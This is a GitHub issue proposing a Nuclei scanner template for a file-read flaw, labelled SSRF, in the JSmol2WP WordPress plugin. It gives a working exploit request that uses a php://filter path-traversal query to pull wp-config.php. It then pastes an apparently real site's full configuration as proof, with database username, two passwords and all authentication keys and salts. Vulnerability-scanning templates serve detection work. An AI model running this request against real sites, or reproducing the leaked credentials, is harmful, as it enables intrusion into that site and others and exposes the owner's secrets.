### ISSUE TITLE
[nuclei-template] JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

### ISSUE THREAD

**Issue by vinit989** [projectdiscovery/nuclei-templates#5159]
### Template Information:
The template is used to find SSRF in JSmol2WP <=1.07 versions.

Reference: https://wpscan.com/vulnerability/9197

### Nuclei Template:

```yaml
id: wp-jsmol2-ssrf


info: 
  name: JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)
  author: Vinit Lakra aka DragonX
  severity: Critical
  reference:
    - https://wpscan.com/vulnerability/9197
    
requests: 
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
    
    matchers:
    - type: word
      words:
        - "AUTH_KEY"
```

## Valid Response:

HTTP/1.1 200 OK
Connection: close
Content-Length: 3496
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=x-user-defined
Date: Thu, 18 Aug 2022 19:23:52 GMT
Last-Modified: Thu, 18 Aug 2022 19:23:53 GMT
Server: Apache

<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'xiaobcn_wp1');

/** MySQL database username */
define('DB_USER', 'xiaobcn_wp1');

/** MySQL database password */
//define('DB_PASSWORD', 'V~fJ~DWYbD99#&8');
define('DB_PASSWORD', '47bcda!Q@W#E');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
define('WP_HOME','http://jialuyu.com');
define('WP_SITEURL','http://jialuyu.com');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'bNvmK0tyHmnGsHx9WH3SaNoFr0izA5xKzD1VcQqpmNKXFCLxfNWoWD9PGyXzM8C9');
define('SECURE_AUTH_KEY',  'oEGMU09R33FzXl1olaN2Fs2HSQPJSl2xcTxlgKotFL27AkRc5blXDQL7niNWCYdk');
define('LOGGED_IN_KEY',    'wPtXG784fslFHG5qAZ9Z5SQPT8GCwYUOa79AOMv4bHW3XyU80wVXO4j1cutUX3b0');
define('NONCE_KEY',        'HyDoG0w50mL6lnlvRrbfJA5SMQuKS70CrU4SlsQAgdNWUdhoGCGqLN2z4zaaINSX');
define('AUTH_SALT',        'kIFGGTkgGPQqPCLIsPPbaWCc0XLTTNz3xQAaejad45nKS6w3A9bMP5VcsrWLfLUu');
define('SECURE_AUTH_SALT', 'vh4KMwiE3vLIsXCFrtx8Ndb9yatMGrAeXVciHfE026G2rJjr3JEH2FmvX6btHtI9');
define('LOGGED_IN_SALT',   'oSyT27Ssvp8Tmfz2EcX6wM3U8CYhoKAI1TJGVmHmSqAUoXLUWheeMh0xcK4Turyz');
define('NONCE_SALT',       'hbSxVLmrsXz7CCpksYqbdscV83BXOFURkyxSESkv985JVLgpjdgIGcFRu7CX98qs');

/**
 * Other customizations.
 */
define('FS_METHOD','direct');define('FS_CHMOD_DIR',0755);define('FS_CHMOD_FILE',0644);
define('WP_TEMP_DIR',dirname(__FILE__).'/wp-content/uploads');

/**
 * Turn off automatic updates since these are managed upstream.
 */
define('AUTOMATIC_UPDATER_DISABLED', true);
define('WP_MEMORY_LIMIT', '1000M');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Note: I have attached the screenshots for a valid requests.
[screenshots.pdf](https://github.com/projectdiscovery/nuclei-templates/files/9376985/screenshots.pdf)
